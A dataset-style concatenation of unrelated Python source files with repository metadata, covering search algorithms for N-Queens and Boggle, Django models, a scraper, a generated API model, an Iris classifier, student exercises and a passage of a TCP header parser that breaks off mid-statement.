class NQueensProblem(Problem):
"""The problem of placing N queens on an NxN board with none attacking
each other. A state is represented as an N-element array, where
a value of r in the c-th entry means there is a queen at column c,
row r, and a value of None means that the c-th column has not been
filled in yet. We fill in columns left to right.
>>> depth_first_tree_search(NQueensProblem(8))
<Node [7, 3, 0, 2, 5, 1, 6, 4]>
"""
def __init__(self, N):
self.N = N
self.initial = [None] * N
def actions(self, state):
"""In the leftmost empty column, try all non-conflicting rows."""
if state[-1] is not None:
return [] # All columns filled; no successors
else:
col = state.index(None)
return [row for row in range(self.N)
if not self.conflicted(state, row, col)]
def result(self, state, row):
"""Place the next queen at the given row."""
col = state.index(None)
new = state[:]
new[col] = row
return new
def conflicted(self, state, row, col):
"""Would placing a queen at (row, col) conflict with anything?"""
return any(self.conflict(row, col, state[c], c)
for c in range(col))
def conflict(self, row1, col1, row2, col2):
"""Would putting two queens in (row1, col1) and (row2, col2) conflict?"""
return (row1 == row2 or # same row
col1 == col2 or # same column
row1 - col1 == row2 - col2 or # same \ diagonal
row1 + col1 == row2 + col2) # same / diagonal
def goal_test(self, state):
"""Check if all columns filled, no conflicts."""
if state[-1] is None:
return False
return not any(self.conflicted(state, state[col], col)
for col in range(len(state)))
# ______________________________________________________________________________
# Inverse Boggle: Search for a high-scoring Boggle board. A good domain for
# iterative-repair and related search techniques, as suggested by Justin Boyan.
ALPHABET = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
cubes16 = ['FORIXB', 'MOQABJ', 'GURILW', 'SETUPL',
'CMPDAE', 'ACITAO', 'SLCRAE', 'ROMASH',
'NODESW', 'HEFIYE', 'ONUDTK', 'TEVIGN',
'ANEDVZ', 'PINESH', 'ABILYT', 'GKYLEU']
def random_boggle(n=4):
"""Return a random Boggle board of size n x n.
We represent a board as a linear list of letters."""
cubes = [cubes16[i % 16] for i in range(n * n)]
random.shuffle(cubes)
return list(map(random.choice, cubes))
# The best 5x5 board found by Boyan, with our word list this board scores
# 2274 words, for a score of 9837
boyan_best = list('RSTCSDEIAEGNLRPEATESMSSID')
def print_boggle(board):
"""Print the board in a 2-d array."""
n2 = len(board)
n = exact_sqrt(n2)
for i in range(n2):
if i % n == 0 and i > 0:
print()
if board[i] == 'Q':
print('Qu', end=' ')
else:
print(str(board[i]) + ' ', end=' ')
print()
def boggle_neighbors(n2, cache={}):
"""Return a list of lists, where the i-th element is the list of indexes
for the neighbors of square i."""
if cache.get(n2):
return cache.get(n2)
n = exact_sqrt(n2)
neighbors = [None] * n2
for i in range(n2):
neighbors[i] = []
on_top = i < n
on_bottom = i >= n2 - n
on_left = i % n == 0
on_right = (i+1) % n == 0
if not on_top:
neighbors[i].append(i - n)
if not on_left:
neighbors[i].append(i - n - 1)
if not on_right:
neighbors[i].append(i - n + 1)
if not on_bottom:
neighbors[i].append(i + n)
if not on_left:
neighbors[i].append(i + n - 1)
if not on_right:
neighbors[i].append(i + n + 1)
if not on_left:
neighbors[i].append(i - 1)
if not on_right:
neighbors[i].append(i + 1)
cache[n2] = neighbors
return neighbors
def exact_sqrt(n2):
"""If n2 is a perfect square, return its square root, else raise error."""
n = int(math.sqrt(n2))
assert n * n == n2
return n
# _____________________________________________________________________________
class Wordlist:
"""This class holds a list of words. You can use (word in wordlist)
to check if a word is in the list, or wordlist.lookup(prefix)
to see if prefix starts any of the words in the list."""
def __init__(self, file, min_len=3):
lines = file.read().upper().split()
self.words = [word for word in lines if len(word) >= min_len]
self.words.sort()
self.bounds = {}
for c in ALPHABET:
c2 = chr(ord(c) + 1)
self.bounds[c] = (bisect.bisect(self.words, c),
bisect.bisect(self.words, c2))
def lookup(self, prefix, lo=0, hi=None):
"""See if prefix is in dictionary, as a full word or as a prefix.
Return two values: the first is the lowest i such that
words[i].startswith(prefix), or is None; the second is
True iff prefix itself is in the Wordlist."""
words = self.words
if hi is None:
hi = len(words)
i = bisect.bisect_left(words, prefix, lo, hi)
if i < len(words) and words[i].startswith(prefix):
return i, (words[i] == prefix)
else:
return None, False
def __contains__(self, word):
return self.lookup(word)[1]
def __len__(self):
return len(self.words)
# _____________________________________________________________________________
class BoggleFinder:
"""A class that allows you to find all the words in a Boggle board."""
wordlist = None # A class variable, holding a wordlist
def __init__(self, board=None):
if BoggleFinder.wordlist is None:
BoggleFinder.wordlist = Wordlist(open_data("EN-text/wordlist.txt"))
self.found = {}
if board:
self.set_board(board)
def set_board(self, board=None):
"""Set the board, and find all the words in it."""
if board is None:
board = random_boggle()
self.board = board
self.neighbors = boggle_neighbors(len(board))
self.found = {}
for i in range(len(board)):
lo, hi = self.wordlist.bounds[board[i]]
self.find(lo, hi, i, [], '')
return self
def find(self, lo, hi, i, visited, prefix):
"""Looking in square i, find the words that continue the prefix,
considering the entries in self.wordlist.words[lo:hi], and not
revisiting the squares in visited."""
if i in visited:
return
wordpos, is_word = self.wordlist.lookup(prefix, lo, hi)
if wordpos is not None:
if is_word:
self.found[prefix] = True
visited.append(i)
c = self.board[i]
if c == 'Q':
c = 'QU'
prefix += c
for j in self.neighbors[i]:
self.find(wordpos, hi, j, visited, prefix)
visited.pop()
def words(self):
"""The words found."""
return list(self.found.keys())
scores = [0, 0, 0, 0, 1, 2, 3, 5] + [11] * 100
def score(self):
"""The total score for the words found, according to the rules."""
return sum([self.scores[len(w)] for w in self.words()])
def __len__(self):
"""The number of words found."""
return len(self.found)
# _____________________________________________________________________________
def boggle_hill_climbing(board=None, ntimes=100, verbose=True):
"""Solve inverse Boggle by hill-climbing: find a high-scoring board by
starting with a random one and changing it."""
finder = BoggleFinder()
if board is None:
board = random_boggle()
best = len(finder.set_board(board))
for _ in range(ntimes):
i, oldc = mutate_boggle(board)
new = len(finder.set_board(board))
if new > best:
best = new
if verbose:
print(best, _, board)
else:
board[i] = oldc # Change back
if verbose:
print_boggle(board)
return board, best
def mutate_boggle(board):
i = random.randrange(len(board))
oldc = board[i]
# random.choice(boyan_best)
board[i] = random.choice(random.choice(cubes16))
return i, oldc
# ______________________________________________________________________________
# Code to compare searchers on various problems.
class InstrumentedProblem(Problem):
"""Delegates to a problem, and keeps statistics."""
def __init__(self, problem):
self.problem = problem
self.succs = self.goal_tests = self.states = 0
self.found = None
def actions(self, state):
self.succs += 1
return self.problem.actions(state)
def result(self, state, action):
self.states += 1
return self.problem.result(state, action)
def goal_test(self, state):
self.goal_tests += 1
result = self.problem.goal_test(state)
if result:
self.found = state
return result
def path_cost(self, c, state1, action, state2):
return self.problem.path_cost(c, state1, action, state2)
def value(self, state):
return self.problem.value(state)
def __getattr__(self, attr):
return getattr(self.problem, attr)
def __repr__(self):
return '<{:4d}/{:4d}/{:4d}/{}>'.format(self.succs, self.goal_tests,
self.states, str(self.found)[:4])
def compare_searchers(problems, header,
searchers=[breadth_first_tree_search,
breadth_first_search,
depth_first_graph_search,
iterative_deepening_search,
depth_limited_search,
recursive_best_first_search]):
def do(searcher, problem):
p = InstrumentedProblem(problem)
searcher(p)
return p
table = [[name(s)] + [do(s, p) for p in problems] for s in searchers]
print_table(table, header)
def compare_graph_searchers():
"""Prints a table of search results."""
compare_searchers(problems=[GraphProblem('Arad', 'Bucharest', romania_map),
GraphProblem('Oradea', 'Neamt', romania_map),
GraphProblem('Q', 'WA', australia_map)],
header=['Searcher', 'romania_map(Arad, Bucharest)',
'romania_map(Oradea, Neamt)', 'australia_map'])
|
[
"tiagovcsoares@gmail.com"
] |
tiagovcsoares@gmail.com
|
3d1830d5bdc9a6ab4ef260b8c4c6114239a72d8d
|
4f15586a6244a5c985d3a3dfe048a2c6e6bdcb62
|
/L5/hw5_t7.py
|
7305814c6c6d77eb53f51113c43afd55eb23c690
|
[] |
no_license
|
irina-rus/Geekbrains
|
4fcf1303e7e8ac6ad022d7b5cea2d9bd394a2ec0
|
c63c76c7cf5e43b9a7acd8edac251b845c44e024
|
refs/heads/main
| 2023-01-24T14:00:36.812112
| 2020-11-30T12:31:58
| 2020-11-30T12:31:58
| 309,063,437
| 0
| 0
| null | 2020-11-30T12:31:59
| 2020-11-01T09:38:23
|
Python
|
UTF-8
|
Python
| false
| false
| 2,214
|
py
|
#Создать вручную и заполнить несколькими строками текстовый файл, в котором каждая строка должна содержать
# данные о фирме: название, форма собственности, выручка, издержки.
#Пример строки файла: firm_1 ООО 10000 5000.
#Необходимо построчно прочитать файл, вычислить прибыль каждой компании, а также среднюю прибыль.
# Если фирма получила убытки, в расчет средней прибыли ее не включать.
#Далее реализовать список. Он должен содержать словарь с фирмами и их прибылями, а также словарь со средней прибылью.
# Если фирма получила убытки, также добавить ее в словарь (со значением убытков).
#Пример списка: [{“firm_1”: 5000, “firm_2”: 3000, “firm_3”: 1000}, {“average_profit”: 2000}].
#Итоговый список сохранить в виде json-объекта в соответствующий файл.
#Пример json-объекта:
#[{"firm_1": 5000, "firm_2": 3000, "firm_3": 1000}, {"average_profit": 2000}]
#Подсказка: использовать менеджер контекста.
with open("file_5_7.txt", "r", encoding="UTF-8") as file:
for line in file:
print(line)
import json
profit = {}
pr = {}
p = 0
prof_aver = 0
i = 0
with open("file_5_7.txt", "r") as file:
for line in file:
name, firm, revenue, loss = line.split()
profit[name] = int(revenue) - int(loss)
if profit.setdefault(name) >= 0:
p = p + profit.setdefault(name)
i += 1
if i != 0:
prof_aver = p / i
pr = {'average profit': round(prof_aver)}
profit.update(pr)
print(f'Firms profit: {profit}')
with open("file_5_7.json", "w") as write_js:
json.dump(profit, write_js)
js_str = json.dumps(profit)
print(f'json file: {js_str}')
|
[
"irinakostiukhina@gmail.com"
] |
irinakostiukhina@gmail.com
|
3e36db025300c5138304afcafd13faa606c1afac
|
5a00bbd360532af1d56782aaa4294c3760b75d5f
|
/main.py
|
e88ae465b5a890cdd5c4b3716e4e4c4cdc27bd82
|
[] |
no_license
|
sharkoe/NBA
|
13972ec789210784506688f313cc3f4aa2a88c8c
|
7e34cb6cb19b666ab1b662e4f0813e041d458c17
|
refs/heads/master
| 2023-05-17T18:46:33.442751
| 2021-05-25T19:28:34
| 2021-05-25T19:28:34
| 370,447,925
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,536
|
py
|
from package import *
import sys
import os
def main(url):
print('Starting scrapper... \n')
# create a soup table
data_table = datascraper.get_first_table(url) # this will select the table on the site
print('URL pull complete. \n')
# select these names of the columns based on the header table
column_names = datascraper.list_of_headers(data_table)
# create data frame from the website table
final_data_frame = datascraper.create_df(soup_table=data_table, list_of_column_names=column_names)
print('Data Table complete. \n')
# do you want to save the data frame to excel workbook?
save_decision = input('Do you want to save table to an excel worksheet? (Y/N)' ).upper()
if save_decision == 'Y':
path_decision = input('Do you want to use your current directory {}? (Y/N) '.format(os.getcwd()) ).upper()
if path_decision == 'Y':
save_dir = os.getcwd()
else:
save_dir = input('Please enter the full path of the save location: ')
save_file = input('Please enter a file name (with no extension): ')
try:
datascraper.save_df(final_data_frame, save_dir, save_file)
print('File successfully saved at {}.'.format(save_dir))
except:
print('I don\'t think the file saved, you should double check.')
if __name__ == '__main__':
    # Use the URL from the command line when given, otherwise prompt for it.
    # (Was a try/except IndexError, which also swallowed any IndexError
    # raised *inside* main() and silently re-prompted.)
    if len(sys.argv) > 1:
        main(sys.argv[1])
    else:
        url = input('Please enter url: ')
        main(url)
|
[
"steven.markoe@gmail.com"
] |
steven.markoe@gmail.com
|
29b9da5ced991495507325a3e78188d243514e72
|
5ec06dab1409d790496ce082dacb321392b32fe9
|
/clients/python/generated/swaggeraemosgi/model/com_adobe_cq_dam_dm_process_image_p_tiff_manager_impl_properties.py
|
7b769282469f192d53feaae0bdaea35623a74394
|
[
"Apache-2.0"
] |
permissive
|
shinesolutions/swagger-aem-osgi
|
e9d2385f44bee70e5bbdc0d577e99a9f2525266f
|
c2f6e076971d2592c1cbd3f70695c679e807396b
|
refs/heads/master
| 2022-10-29T13:07:40.422092
| 2021-04-09T07:46:03
| 2021-04-09T07:46:03
| 190,217,155
| 3
| 3
|
Apache-2.0
| 2022-10-05T03:26:20
| 2019-06-04T14:23:28
| null |
UTF-8
|
Python
| false
| false
| 6,954
|
py
|
"""
Adobe Experience Manager OSGI config (AEM) API
Swagger AEM OSGI is an OpenAPI specification for Adobe Experience Manager (AEM) OSGI Configurations API # noqa: E501
The version of the OpenAPI document: 1.0.0-pre.0
Contact: opensource@shinesolutions.com
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
import nulltype # noqa: F401
from swaggeraemosgi.model_utils import ( # noqa: F401
ApiTypeError,
ModelComposed,
ModelNormal,
ModelSimple,
cached_property,
change_keys_js_to_python,
convert_js_args_to_python_args,
date,
datetime,
file_type,
none_type,
validate_get_composed_info,
)
def lazy_import():
from swaggeraemosgi.model.config_node_property_integer import ConfigNodePropertyInteger
globals()['ConfigNodePropertyInteger'] = ConfigNodePropertyInteger
class ComAdobeCqDamDmProcessImagePTiffManagerImplProperties(ModelNormal):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
Attributes:
allowed_values (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
with a capitalized key describing the allowed value and an allowed
value. These dicts store the allowed enum values.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
discriminator_value_class_map (dict): A dict to go from the discriminator
variable value to the discriminator class name.
validations (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
that stores validations for max_length, min_length, max_items,
min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,
inclusive_minimum, and regex.
additional_properties_type (tuple): A tuple of classes accepted
as additional properties values.
"""
allowed_values = {
}
validations = {
}
additional_properties_type = None
_nullable = False
@cached_property
def openapi_types():
"""
This must be a method because a model may have properties that are
of type self, this must run after the class is loaded
Returns
openapi_types (dict): The key is attribute name
and the value is attribute type.
"""
lazy_import()
return {
'max_memory': (ConfigNodePropertyInteger,), # noqa: E501
}
@cached_property
def discriminator():
return None
attribute_map = {
'max_memory': 'maxMemory', # noqa: E501
}
_composed_schemas = {}
required_properties = set([
'_data_store',
'_check_type',
'_spec_property_naming',
'_path_to_item',
'_configuration',
'_visited_composed_classes',
])
@convert_js_args_to_python_args
def __init__(self, *args, **kwargs): # noqa: E501
"""ComAdobeCqDamDmProcessImagePTiffManagerImplProperties - a model defined in OpenAPI
Keyword Args:
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
_visited_composed_classes (tuple): This stores a tuple of
classes that we have traveled through so that
if we see that class again we will not use its
discriminator again.
When traveling through a discriminator, the
composed schema that is
is traveled through is added to this set.
For example if Animal has a discriminator
petType and we pass in "Dog", and the class Dog
allOf includes Animal, we move through Animal
once using the discriminator, and pick Dog.
Then in Dog, we will make an instance of the
Animal class but this time we won't travel
through its discriminator because we passed in
_visited_composed_classes = (Animal,)
max_memory (ConfigNodePropertyInteger): [optional] # noqa: E501
"""
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_path_to_item = kwargs.pop('_path_to_item', ())
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
if args:
raise ApiTypeError(
"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
args,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
for var_name, var_value in kwargs.items():
if var_name not in self.attribute_map and \
self._configuration is not None and \
self._configuration.discard_unknown_keys and \
self.additional_properties_type is None:
# discard variable.
continue
setattr(self, var_name, var_value)
|
[
"cliffano@gmail.com"
] |
cliffano@gmail.com
|
6e165a1996c2d894f627d732e0e0ba84b908fa90
|
6fe47c363c8339b277e3756e5c6c70a8664cb320
|
/Q12 - SingleLinePrint/SingleLinePrin.py
|
dd26fc4009e5723bd4bb2f148ed7e3f135abb267
|
[] |
no_license
|
aklgupta/pythonPractice
|
e6f3a4092a708c500ac44ec15680b8c5090f3dcd
|
2c08278754f35227c816ababdec5d711e976c172
|
refs/heads/master
| 2021-01-22T09:33:00.981614
| 2018-08-24T10:03:56
| 2018-08-24T10:03:56
| 102,327,294
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 543
|
py
|
"""Q. 12
Write a Single line Python program that takes two inputs: "String" and "Num".
And then prints the input string given number of times, separated by a single space (Trailing spaces are allowed, but a plus if you remove them as well)
Egs.
Input:
String: A
Num: 5
Output:
A A A A A
Input:
String: ABC
Num: 3
Output:
ABC ABC ABC
Input:
String: A B !
Num: 7
Output:
A B ! A B ! A B ! A B ! A B ! A B ! A B !
"""
print ((raw_input("String: ") + " ") * input("Num: ")).strip()
|
[
"noreply@github.com"
] |
aklgupta.noreply@github.com
|
ec682588230e9c615f3447acb02c2a8b8ad3b94f
|
c0d2347555090a902c099bf24a41aa662315a35b
|
/accumulator.py
|
5e93734234ee771566f72f947154910ceb91b962
|
[] |
no_license
|
VYSHNAVI123/vyshnavi123
|
63d15bba2ab7c95ad5bc1af15c0ab5049da45ff8
|
d76e7780cbf6a8ff6d0e430ef4f0c846b2d4556f
|
refs/heads/master
| 2020-04-19T19:11:53.219277
| 2019-04-21T07:14:30
| 2019-04-21T07:14:30
| 168,382,373
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 193
|
py
|
from matplotlib import pyplot as plt
import numpy as np
x=np.arange(0,10,1)
k=1
a=0
l=[]
for i in range(0,10,1):
for j in range(0,k,1):
a=a+1
l.append(a)
plt.stem(x,l)
plt.show()
|
[
"noreply@github.com"
] |
VYSHNAVI123.noreply@github.com
|
5273ad6d41579237ec7873bcd9476e2e67ec49da
|
c3a8a0564ebca0ce66ae51989d62ab0a713944af
|
/爱鲜蜂项目/main_app/models.py
|
c5d125e50e08c435b8defd64e39fbfbc04352edc
|
[] |
no_license
|
happyQiao-PS/Django-
|
858f98a3603c0c75d21fbe02be571b19783e03de
|
ff896fe31a587c89fb0b5077b30caae24fb414dd
|
refs/heads/master
| 2022-11-24T18:19:40.012211
| 2020-04-04T04:23:32
| 2020-04-04T04:23:32
| 238,108,458
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,991
|
py
|
from django.db import models
# Create your models here.
'''
商品表:
商品id(productid) 118826
图片(productimg) http://img01.bqstatic.com/upload/goods/201/701/1916/20170119164119_550363.jpg@200w_200h_90Q
名字(productname) 爱鲜蜂·海南千禧果
长名字(productlongname) 爱鲜蜂·海南千禧果400-450g/盒
是否精选(isxf) 1
是否买一增一(pmdesc) 1
规格(specifics)
价格(price) 13.80
原价(marketprice) 13.8
商品组id(categoryid) 103532
商品子组id(childcid) 103533
商品子组名名称(childcidname) 国产水果
详情页id(dealerid) 4858
库存(storenums) 7
销量(productnum)
'''
class axf_goods(models.Model):
productid = models.IntegerField()
productimg = models.CharField(max_length=256)
productname = models.CharField(max_length=256)
productlongname = models.CharField(max_length=256)
isxf = models.BooleanField(default=True)
pmdesc = models.BooleanField(default=True)
specifics = models.CharField(max_length=128)
price = models.FloatField(default=1.0)
marketprice = models.FloatField(default=1.0)
categoryid = models.IntegerField(default=0)
childcid = models.IntegerField(default=0)
childcidname = models.CharField(max_length=128)
dealerid = models.IntegerField(default=0)
storenums = models.IntegerField(default=0)
productnum = models.IntegerField(default=0)
class Meta:
db_table="axf_goods"
class axf_foodtypes(models.Model):
typeid = models.IntegerField(default=0)
typename = models.CharField(max_length=256)
childtypenames = models.CharField(max_length=256)
typesort = models.IntegerField(default=0)
class Meta:
db_table="axf_foodtypes"
class axf_user(models.Model):
u_username = models.CharField(max_length=128)
u_email = models.CharField(max_length=48,unique=True)
u_password = models.CharField(max_length=128)
u_icon = models.ImageField(upload_to=r"icon/%Y/%m/%d")
u_isactivate = models.BooleanField(default=False)
u_isdelete = models.BooleanField(default=False)
class Meta:
db_table="axf_user"
class axf_shopping_cart(models.Model):
s_good = models.ForeignKey(axf_goods)
s_user = models.ForeignKey(axf_user)
s_num = models.IntegerField(default=0)
s_isChoice = models.BooleanField(default=True)
s_isDelete = models.BooleanField(default=False)
class Meta:
db_table = "axf_shopping_cart"
class axf_order(models.Model):
o_user = models.ForeignKey(axf_user,null=True,on_delete=models.SET_NULL)
o_time = models.DateTimeField(auto_now=True)
o_price = models.FloatField(default=0.0)
o_order_statu = models.IntegerField(default=0)
class Meta:
db_table="axf_order"
class axf_ordergoods(models.Model):
og_goods = models.ForeignKey(axf_goods)
og_order = models.ForeignKey(axf_order)
og_num = models.IntegerField(default=1)
class Meta:
db_table="axf_ordergoods"
|
[
"2945887050@qq.com"
] |
2945887050@qq.com
|
2d80e01da5de1cc702c1b4882e14eb25a8e5528b
|
da2b4c8fc550fc3dd7f5f54fcb1dc61c39b25dc0
|
/string/bestcal.py
|
603331deb0d3d16ae3686ed4de0e3f56c0616937
|
[] |
no_license
|
DecapitatorBond/projects
|
b9b6c1ac147b6cc5d3ccb07fcaa153d084bb2c1e
|
54eabe2279c5ff5869b97548454f91d97230326c
|
refs/heads/master
| 2020-06-07T07:56:19.624500
| 2019-07-23T18:18:45
| 2019-07-23T18:18:45
| 192,967,115
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 379
|
py
|
# import newcalc
#
#
#
# m_arg1, m_arg2, m_action = newcalc.input_data()
# try:
# m_arg1, m_arg2, m_action = newcalc.check_data(m_arg1, m_arg2, m_action)
# except newcalc.CalcException as e:
# print(e)
# exit(1)
# newcalc.output_data(m_arg1, m_arg2, m_action)
# from newcalc import input_data
#
# a, b, c = input_date()
# print(a, b, c)
|
[
"xxxzverxxx1998@gmail.com"
] |
xxxzverxxx1998@gmail.com
|
2470feb7e488ffd951c2f385d2f003e8ff627ecd
|
f75f199eff46880efd2f66208db6964a8418a51a
|
/day2/operator_teaching.py
|
fdd61d3cf523111a45b1d3c13fa78d834bf095ac
|
[] |
no_license
|
LeAlpha/PythonNotes
|
75e852ef0f8a40794c2f4fe0a6600fc55d3949c7
|
95ad836d8462e9ac390336638fa43666321f091e
|
refs/heads/master
| 2021-01-01T15:09:12.857948
| 2020-02-11T21:08:57
| 2020-02-11T21:08:57
| 239,331,151
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 178
|
py
|
# Hvis man gerne vil have et pænt output kan man bruge * (unpacking operator):
numbers = [1, 2, 3, 5]
print(numbers)
print(*numbers)
# De kan bruges til at lave en liste nemt
|
[
"Stephankhader@gmail.com"
] |
Stephankhader@gmail.com
|
f5111aa622c03131b4958d9a881c416a46adb38d
|
bd0f13bf205f453559e8451c91a9f3ce49005312
|
/statistics/statistics.py
|
c491a4efe892f26ee3356498d30e9b6c5992c016
|
[
"MIT"
] |
permissive
|
stevehamwu/EmotionCauseExtraction
|
95c8914d2617fa392af8630e3342bd032f6ed3eb
|
b5a160f35f7b03bf3730b6885096dbc5f958df8b
|
refs/heads/master
| 2021-10-27T05:26:29.463552
| 2019-04-16T07:04:00
| 2019-04-16T07:04:00
| 178,976,046
| 4
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 514
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2018/12/14 22:09
# @Author : Steve Wu
# @Site :
# @File : statistics.py
# @Software: PyCharm
# @Github : https://github.com/stevehamwu
from abc import ABCMeta, abstractmethod
from utils.app.log import Logger
class Statistics:
__metaclass__ = ABCMeta
def __init__(self):
self.logger = Logger.get_instance()
@abstractmethod
def __call__(self, datasets, all_probs, model_path, epoch):
"""
"""
pass
|
[
"stevehamwu@gmail.com"
] |
stevehamwu@gmail.com
|
3b535ecb1b332a1552b481f59c771def9df427c9
|
b3d2ec5b71718c19f4946b6dddfdf2f85c8888dc
|
/Leetcode/151~200/L169 求众数.py
|
373851728662a0cf2208aca53d802a849977c218
|
[] |
no_license
|
Mr-ZDS/Python_Brid
|
188b90f0803b5738d3cf4eb07a529c9afc093c2c
|
3c67f5fdd98c4424a19c2dc01e6bc4b6acebb1dd
|
refs/heads/master
| 2020-04-29T10:26:23.579411
| 2019-08-20T08:38:19
| 2019-08-20T08:38:19
| 176,062,095
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 310
|
py
|
class Solution:
def majorityElement(self, nums: List[int]) -> int:
count, result = 0, nums[0]
for i in nums[1:]:
if i == result:
count += 1
elif count > 0:
count -= 1
else:
result = i
return result
|
[
"zhdashuai@foxmail.com"
] |
zhdashuai@foxmail.com
|
49d3abd9fddb6b20f419bffd5990a35d1df62348
|
25d47540ff7bbc6d48d7908473b3e7e507962f83
|
/Python_Primer/Iris.py
|
1ea65dc3f80f289593ad7ee0b8f2d2f12728735e
|
[] |
no_license
|
nuonuozi/Python-
|
993319eca806ee8b81933b2103842dbf8c947a75
|
5b90c471af53d366f4749d676c8cd929de4f857a
|
refs/heads/master
| 2022-04-06T17:01:23.947639
| 2019-01-20T07:14:48
| 2019-01-20T07:14:48
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,255
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Thu Oct 18 09:41:46 2018
@author: asus
"""
#导入iris数据加载器
from sklearn.datasets import load_iris
#使用加载器读取数据并存入变量iris
iris=load_iris()
#查验数据规模
#print(iris.data.shape)
#查看数据说明
#print(iris.DESCR)
#对数据进行随机分割
from sklearn.cross_validation import train_test_split
X_train,X_test,y_train,y_test=train_test_split(iris.data,iris.target,test_size=0.25,random_state=33)
#使用K近邻分类器对数据进行类别预测
#导入标准化模块
from sklearn.preprocessing import StandardScaler
from sklearn.neighbors import KNeighborsClassifier
#对训练数据的测试的特征数据进行标准化
ss=StandardScaler()
X_train=ss.fit_transform(X_train)
X_test=ss.transform(X_test)
#使用K近邻分类器对测试数据进行类别预测,预测结果保存在y_predict中
knc=KNeighborsClassifier()
knc.fit(X_train,y_train)
y_predict=knc.predict(X_test)
#对K近邻分类器数据的预测性能进行评估
print('The accuracy of K-Nearest Neighbor Classifier is',knc.score(X_test,y_test))
#详情分析
from sklearn.metrics import classification_report
print(classification_report(y_test,y_predict,target_names=iris.target_names))
|
[
"3255893782@qq.com"
] |
3255893782@qq.com
|
01a81e0c71bd42b48a2930aa0688a421ceabef9d
|
d2d4e2dbefe82d33c81d7b1d96b1bb269f41198e
|
/DjangoTestApp/asgi.py
|
f1198a37260487e212c2df80790e244505c69d33
|
[] |
no_license
|
Saitama0811/django-blog-app
|
9a31783048267140a57e71b3d2f07d0fa2aee9c5
|
58387988c4988694acea9bed3c32443a05212a2f
|
refs/heads/main
| 2023-01-01T16:10:55.555627
| 2020-10-20T15:16:44
| 2020-10-20T15:16:44
| 305,743,182
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 403
|
py
|
"""
ASGI config for DjangoTestApp project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'DjangoTestApp.settings')
application = get_asgi_application()
|
[
"goel.123.saurabh@gmail.com"
] |
goel.123.saurabh@gmail.com
|
90ccd4ffffa9e98eb7765b90450e987e78d04300
|
3f9a6d4e12fe5ccdd5913553e2e726cbdf702431
|
/Lab03/exercise6_1_2.py
|
1616e569661ba0832b6956ec897499c5be1f2ed6
|
[] |
no_license
|
xingengwang/transportation_Network
|
278c5b13f61a62d1f9da73217500c97cceed80b6
|
06fc2e5299d235399f1a1bdaf90a7d6726ed68c3
|
refs/heads/master
| 2021-01-11T18:08:35.749196
| 2017-03-18T19:20:21
| 2017-03-18T19:20:21
| 79,502,467
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,269
|
py
|
'''
xingeng wang
11144515
xiw031
'''
TCPPacket = input("Please type the TCP Packet String: ")
TCPPacketLength = 4*len(TCPPacket)
TCPPacketBin = bin(int(TCPPacket,16))[2:].zfill(TCPPacketLength)
TCPPacketDict ={}
TCPPacketDict['SRC. PORT ADDR. (16 BITS)'] = int(TCPPacketBin[0:16],2)
TCPPacketDict['DST. PORT ADDR. (16 BITS)'] = int(TCPPacketBin[16:32],2)
TCPPacketDict['SEQUENCE NO. (32 BITS)'] = int(TCPPacketBin[32:64],2)
TCPPacketDict['ACKNOWLEDGMENT NO. (32 BITS)'] = int(TCPPacketBin[64:96],2)
TCPPacketDict['HLEN (4 BITS)'] = int(TCPPacketBin[96:100],2)
TCPPacketDict['RESERVED (6 BITS)'] = int(TCPPacketBin[100:106],2)
TCPPacketDict['URG'] = int(TCPPacketBin[106],2)
TCPPacketDict['ACK'] = int(TCPPacketBin[107],2)
TCPPacketDict['PSH'] = int(TCPPacketBin[108],2)
TCPPacketDict['RST'] = int(TCPPacketBin[109],2)
TCPPacketDict['SYN'] = int(TCPPacketBin[110],2)
TCPPacketDict['FIN'] = int(TCPPacketBin[111],2)
TCPPacketDict['WINDOW SIZE (16 BITS)'] = int(TCPPacketBin[112:128],2)
TCPPacketDict['CHECKSUM (16 BITS)'] = int(TCPPacketBin[128:144],2)
TCPPacketDict['URGENT POINTER (16 BITS)'] = int(TCPPacketBin[144:160],2)
if (TCPPacketLength>480):
